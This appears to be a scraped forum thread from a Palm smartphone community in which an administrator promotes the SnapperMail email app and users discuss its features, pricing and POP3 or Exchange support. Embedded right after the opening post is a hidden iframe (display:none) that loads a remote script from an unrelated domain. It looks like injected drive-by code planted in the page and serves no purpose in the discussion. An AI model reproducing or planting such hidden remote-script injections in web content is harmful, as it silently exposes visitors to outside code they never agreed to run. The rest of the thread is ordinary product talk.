+ Reply to Thread
Page 1 of 4 1 2 3 4 LastLast
    Administrator

SnapperMail. All in one mobile solution!

guys and gals, this application does it all.

you can zip and unzip files on the 6035/7135...

you can download unlimited messages from your email clients.

view jpeg images, read e-books...

plus more. tons more....

the public beta is almost released,, perhaps by next week.

visit the site for more info.

it really could be the end all be all of programs for the smartphone.

( i have been a part of the private beta, so i can attest to how well it works)

SnapperMail<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Wow that looks great!!!! I can't wait for the beta!!!
    -=Jimmyjoe=-

Very good catch. I am on the list!!!

Administrator
    il be sure and post when it becomes available.

Am I reading the specs right? You can download apps? Looks freaking great...
    good luck, Don
    A real man keeps his promises...Its all about family because it all goes back in the box in the end.

Originally posted by 6035fanatic
    Am I reading the specs right? You can download apps? Looks freaking great...
    good luck, Don
    Well Multi-Mail has always been capable of downloading applications and attachements, but it wasn't dynamic enough for me for DOC, XLS, PDF, etc. This one is perfect because I can save the attachment to open in another app. Multi-mail uses plugins that are kinda crappy...

I mean direct to the phone downloads without, (pardon me) any hotsync. Mainly for apps...
    Thanks Don
    A real man keeps his promises...Its all about family because it all goes back in the box in the end.

Thanks for the great tip Marc! I still need to read more about it, but so far it looks great! I signed up to be notified. It sounds like we would need to have a zip program also to unzip files? (or is that included?). Nevermind... just saw that it was included. One thing I wasn't clear about... can you both send and open attachments?
    Please visit my picture site: Robert-O-Rama :)

I mean direct to the phone downloads without, (pardon me) any hotsync. Mainly for apps...
    Thanks Don
    Thats what I was referring to. Multi-Mail downloads them on wireless email.

Administrator
    hotsync is right and you can download unlimited emails, no limit (of course you must have enuff memory)

yes you can send and open atachments. all the plugins are included u can install apps to the phone also withuot the need to hotsync.

Originally posted by marctronixx
    yes you can send and open atachments. all the plugins are included u can install apps to the phone also withuot the need to hotsync.
    That is beautiful... it would be great to be able to work on Excel spreadsheets and Word docs and send them in to work from the road. And downloading and installing Palm OS apps wirelessly will be really sweet... especially at 3G speeds!

Sorry about the OT, but speaking of 3G speeds, I was on the phone with Sprint PCS last night and asked about the unlimited vision data plan... she couldn't find anything about it, although I have heard from lots of boards that people have gotten it. I just hope they have their act together by the time we get our 7135's! I have every intention of seriously abusing unlimited data... I wouldn't be surprised to see my usage go over a gig a month!
    Please visit my picture site: Robert-O-Rama :)

What kind of pricing are we looking at for the unlimited usage plans?
    Also does snappermail allow downloads from sites directly or just through attachments to email? I am not trying to beat a dead horse(I know that his legs are up in the air and twitching) but I am looking for direct download from sites. I've gotten info on Vagabond (www.linux.com/palm/vagabond) and skipwire(www.skipwire.com) but this sounds like an unfettered complete app without the need of a proxi-server, or fee based service.
    Thanks... Don

Administrator
    What kind of pricing are we looking at for the unlimited usage plans?
    Thanks... Don
    We'll be selling at $39.95 however during the public beta window of
    about a month, customers will be able to purchase it UNSUPPORTED for
    $24.95... They'll get a free upgrade to the full release when it's ready.

Don,

Snapper Mail is just a mail application. It's up to you where you get your mail from. How much it costs you to use, is dependant on your wireless plan and how you are billed for data calls.

Snapper Mail is not designed for downloading files from websites, it's just an email applications. I have not seen a web browser for the palm that allows for attachment download.

Sounds very impressive. I have registered to be notified when the public beta is released.

Thanks for the heads-up Marc!
    Dave

Administrator
    Dr. DW, ill definately keep you updated...

Does this only work with a POP 3 server or will it also work with an Exchange server?

According to thier site...no.

But you only know what we do....

http://www.snappermail.com/palm/email/specs.cfm

how about non pop3 like yahoo

o.k. so how about non POP3 servers like free yahoo? Is there a way to get your free email through snapper?

Don

Exchange server does SMTP & POP3 too

Originally posted by RMSko
    Does this only work with a POP 3 server or will it also work with an Exchange server?
    Exchange server can, and may already, be setup to allow POP3 and SMTP access so that you could send and receive e-mail on the go.

You wouldn't be able to access your Calendar, Contacts, Tasks, or Notes, that requires a full Exchange client, but e-mail only access is better than nothing.

Talk to your network administrator (assuming that they are friendly and enjoy technology), they might surprise you.